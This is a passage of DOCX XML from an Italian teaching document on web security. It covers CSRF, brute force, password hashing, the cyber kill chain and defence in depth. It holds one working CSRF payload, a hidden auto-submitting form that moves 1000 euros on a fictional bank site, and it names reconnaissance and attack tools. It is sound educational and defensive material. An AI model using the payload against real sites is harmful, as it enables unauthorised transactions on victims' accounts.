        <w:t xml:space="preserve">HTTP e' un protocollo stateless: ogni richiesta e' indipendente dalle precedenti, il server non mantiene memoria delle sessioni. Per superare questa limitazione, si usano i cookie: dopo il login, il server invia un cookie di sessione al browser, e il browser lo include automaticamente in TUTTE le richieste successive allo stesso dominio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo comportamento automatico del browser e' sia una caratteristica fondamentale (senza di esso, dovresti ri-autenticarti ad ogni pagina) sia la radice del CSRF: il browser non distingue tra una richiesta originata dall'utente e una originata da un sito malevolo. In entrambi i casi, i cookie vengono allegati.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Come Funziona un Attacco CSRF - Esempio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: la vittima e' loggata su bancasicura.com. L'attaccante crea una pagina web con un form nascosto:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form action='https://bancasicura.com/transfer' method='POST' style='display:none'&gt;&lt;input name='to' value='attaccante'&gt;&lt;input name='amount' value='1000'&gt;&lt;/form&gt;&lt;script&gt;document.forms[0].submit()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Flusso dell'attacco: 1) La vittima e' loggata su bancasicura.com (ha un cookie di sessione valido). 2) La vittima visita il sito dell'attaccante (cliccando un link in un'email o navigando). 3) La pagina malevola contiene un form nascosto che si auto-invia. 4) Il browser invia la richiesta POST a bancasicura.com, allegando automaticamente il cookie di sessione. 5) Il server di bancasicura.com riceve la richiesta con un cookie di sessione valido e la esegue. 6) 1000 euro vengono trasferiti all'attaccante senza il consenso della vittima.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Differenza tra CSRF e XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS: l'attaccante inietta codice che viene eseguito NEL browser della vittima, nel contesto del sito fidato. L'attaccante puo' fare tutto cio' che l'utente puo' fare sul sito, e anche leggere dati. CSRF: l'attaccante forza il browser della vittima a INVIARE una richiesta al sito fidato. L'attaccante non puo' leggere la risposta (a causa della Same-Origin Policy), ma l'azione viene comunque eseguita. CSRF e' 'cieco': l'attaccante non vede il risultato dell'azione. XSS e' piu' potente perche' ha pieno accesso.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Difese contro CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF Token: il server genera un token casuale unico per ogni sessione (o per ogni form) e lo include come campo nascosto nel form. Quando il form viene inviato, il server verifica che il token sia valido. Un sito malevolo non puo' conoscere questo token (grazie alla Same-Origin Policy che impedisce di leggere il contenuto di pagine di altri domini), quindi non puo' includere il token corretto nella richiesta forgiata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite Cookie Attribute: attributo dei cookie che controlla quando il browser invia i cookie con richieste cross-site. SameSite=Strict: il cookie non viene mai inviato con richieste cross-site. SameSite=Lax: il cookie viene inviato solo con navigazioni top-level GET (clic su link), non con POST o richieste da iframe/img. SameSite=None: il cookie viene sempre inviato (richiede Secure). I browser moderni impostano Lax come default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verificare il header Origin/Referer: il server puo' controllare da dove proviene la richiesta. Se il header Origin o Referer non corrisponde al proprio dominio, la richiesta viene rifiutata. Non e' una difesa completa perche' questi header possono essere assenti in alcune situazioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Richiedere re-autenticazione per operazioni sensibili: chiedere la password per confermare operazioni critiche come trasferimenti bancari o cambio email. Anche se un CSRF riesce a inviare la richiesta, non puo' fornire la password corretta.</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7: BRUTE FORCE</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cos'e' un Attacco Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attacco brute force consiste nel provare sistematicamente tutte le possibili combinazioni di password (o chiavi) fino a trovare quella corretta. E' l'attacco piu' semplice concettualmente ma puo' essere molto efficace, soprattutto contro password deboli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esistono diverse varianti: Brute force puro (provare ogni combinazione possibile di caratteri), Dictionary attack (usare un dizionario di password comuni come 'password', '123456', 'admin'), Hybrid attack (combinare parole del dizionario con numeri e simboli, es. 'password123!'), Credential stuffing (usare coppie username/password rubate da altri siti, sfruttando il riuso delle password), Password spraying (provare poche password comuni su molti account, per evitare il lockout).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Entropia delle Password e Tempo di Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'entropia di una password misura la sua imprevedibilita' e si calcola in bit. Piu' alta e' l'entropia, piu' la password e' sicura. L'entropia dipende dalla lunghezza della password e dal set di caratteri usato (solo numeri: 10 possibilita' per posizione; lettere minuscole: 26; maiuscole+minuscole: 52; tutti i caratteri stampabili: 95).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tempo stimato per craccare password (con hardware moderno): password di 6 caratteri solo numeri (es. 123456): istantaneo. Password di 8 caratteri lettere minuscole (es. password): circa 5 secondi. Password di 8 caratteri misti (es. P@ssw0rd): circa 8 ore. Password di 12 caratteri misti (es. Tr0ub4dor&amp;3): circa 34.000 anni. Passphrase di 4 parole (es. correct horse battery staple): milioni di anni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Questi tempi assumono un attacco offline (l'attaccante ha l'hash della password). In un attacco online (tramite form di login), la rete e il server introducono latenza che rallenta enormemente l'attacco, ma solo se non c'e' rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash delle Password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le password non dovrebbero MAI essere salvate in chiaro nel database. Si usa un processo di hashing: la password viene trasformata in una stringa di lunghezza fissa (hash) usando una funzione unidirezionale. E' computazionalmente impossibile risalire dalla hash alla password originale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Funzioni di hash per password: bcrypt (aggiunge salt automaticamente e ha un fattore di costo regolabile che lo rende intenzionalmente lento), scrypt (simile a bcrypt ma richiede anche molta memoria, rendendo piu' costoso l'attacco con GPU), Argon2 (vincitore della Password Hashing Competition 2015, considerato lo stato dell'arte). NON usare MD5 o SHA-1/SHA-256 per le password: sono troppo veloci e non hanno salt integrato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Il salt e' una stringa casuale unica per ogni password, aggiunta prima dell'hashing. Impedisce l'uso di rainbow tables (tabelle precalcolate di hash) e fa si' che due utenti con la stessa password abbiano hash diversi. Esempio: hash(password + salt_utente1) produce un hash diverso da hash(password + salt_utente2).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Difese contro Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate limiting: limitare il numero di tentativi di login per IP o per account in un determinato intervallo di tempo. Esempio: massimo 5 tentativi ogni 15 minuti. Dopo il limite, i tentativi successivi vengono bloccati o ritardati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Account lockout: bloccare temporaneamente l'account dopo un certo numero di tentativi falliti. Attenzione: un attaccante potrebbe sfruttare questo meccanismo per bloccare intenzionalmente gli account di altri utenti (denial of service). Soluzione: lockout temporaneo crescente (30 secondi, poi 1 minuto, poi 5 minuti, ecc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CAPTCHA: richiedere la risoluzione di un CAPTCHA dopo un certo numero di tentativi falliti, per verificare che il tentativo provenga da un umano e non da un bot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-Factor Authentication (MFA/2FA): richiedere un secondo fattore di autenticazione oltre alla password (codice SMS, app authenticator, token hardware). Anche se l'attaccante indovina la password, non puo' accedere senza il secondo fattore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Password policy: richiedere password con lunghezza minima (almeno 12 caratteri), vietare password comuni (controllare contro liste come 'Have I Been Pwned'), incoraggiare l'uso di passphrase (frasi lunghe facili da ricordare ma difficili da indovinare).</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8: MULTI-STAGE ATTACK E KILL CHAIN</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La Cyber Kill Chain e' un modello sviluppato da Lockheed Martin che descrive le fasi di un attacco informatico. Comprendere queste fasi aiuta i difensori a identificare e bloccare gli attacchi in ogni fase:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Reconnaissance (Ricognizione): l'attaccante raccoglie informazioni sul bersaglio. Scansione delle porte (nmap), enumerazione dei servizi, ricerca di endpoint web (dirb/gobuster), OSINT (Open Source Intelligence) su dipendenti e tecnologie usate. Piu' informazioni raccoglie, piu' l'attacco sara' efficace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Weaponization (Armamento): l'attaccante prepara il payload basandosi sulle informazioni raccolte. Crea exploit specifici per le vulnerabilita' trovate, prepara strumenti come SQLMap per automatizzare l'attacco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Delivery (Consegna): il payload viene consegnato al sistema vittima. Puo' avvenire tramite email di phishing, link malevolo, upload di file, o direttamente tramite vulnerabilita' di servizi esposti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Exploitation (Sfruttamento): la vulnerabilita' viene effettivamente sfruttata. Esempio: l'SQL Injection viene eseguita con successo e l'attaccante ottiene accesso ai dati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Installation (Installazione): l'attaccante stabilisce una presenza persistente nel sistema. Installa backdoor, crea account, modifica configurazioni per mantenere l'accesso anche se la vulnerabilita' originale viene corretta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Command and Control (C2): l'attaccante stabilisce un canale di comunicazione con il sistema compromesso per inviare comandi e ricevere dati. Usa protocolli comuni (HTTP, DNS) per mascherare il traffico malevolo nel traffico legittimo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Actions on Objectives (Azioni sull'obiettivo): l'attaccante raggiunge il suo obiettivo finale. Esfiltra dati sensibili, cifra i file per ransomware, modifica dati, usa il sistema come punto di partenza per attaccare altri sistemi (lateral movement).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Come si Concatenano le Vulnerabilita'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nella realta', gli attacchi raramente sfruttano una singola vulnerabilita'. Gli attaccanti combinano piu' debolezze per raggiungere il loro obiettivo. Un esempio tipico che abbiamo simulato nella presentazione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 1 - Ricognizione: scansione del target che rivela porte aperte e endpoint web. Fase 2 - SQL Injection: attraverso un endpoint vulnerabile, l'attaccante estrae le credenziali degli utenti dal database, incluse quelle dell'amministratore. Fase 3 - Accesso privilegiato: con le credenziali dell'admin, l'attaccante accede al pannello di amministrazione, ottenendo privilegi elevati. Fase 4 - Dump del database: dall'area admin, l'attaccante scarica l'intero database includendo dati sensibili (segreti, dati finanziari). Fase 5 - Exfiltrazione: i dati rubati vengono trasferiti al server dell'attaccante (server C2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ogni fase dipende dalla precedente: senza la SQL Injection, non si ottengono le credenziali; senza le credenziali, non si accede all'admin; senza l'admin, non si scaricano i dati. Questo dimostra perche' la sicurezza deve essere 'defense in depth': anche se un livello viene violato, gli altri dovrebbero resistere.</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SEZIONE 9: DIFESE E BEST PRACTICES</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Riepilogo Attacchi e Difese</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection -&gt; Difesa: prepared statements (query parametrizzate), input validation, principio del minimo privilegio per l'utente database, WAF.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS -&gt; Difesa: output encoding/escaping, Content Security Policy (CSP), input sanitization, flag HttpOnly sui cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF -&gt; Difesa: CSRF token, SameSite cookie attribute, verifica header Origin/Referer, re-autenticazione per operazioni sensibili.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Force -&gt; Difesa: rate limiting, account lockout progressivo, CAPTCHA, Multi-Factor Authentication (MFA), password policy robuste, hashing con bcrypt/Argon2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Exfiltration -&gt; Difesa: crittografia at rest (dati cifrati nel database), network monitoring (IDS/IPS), principio del minimo privilegio, segmentazione della rete.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Defense in Depth (Difesa in Profondita')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La Defense in Depth e' una strategia che implementa molteplici livelli di sicurezza sovrapposti. L'idea e' che se un livello viene violato, gli altri continuano a proteggere il sistema. Non si affida mai a un singolo controllo di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I livelli tipici sono: Perimetro di rete (firewall, IDS/IPS, WAF), Rete interna (segmentazione, VLAN, monitoraggio traffico), Host (antivirus, hardening del sistema operativo, aggiornamenti), Applicazione (input validation, output encoding, autenticazione, autorizzazione), Dati (crittografia, backup, access control), Utente (formazione, awareness, password policy, MFA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
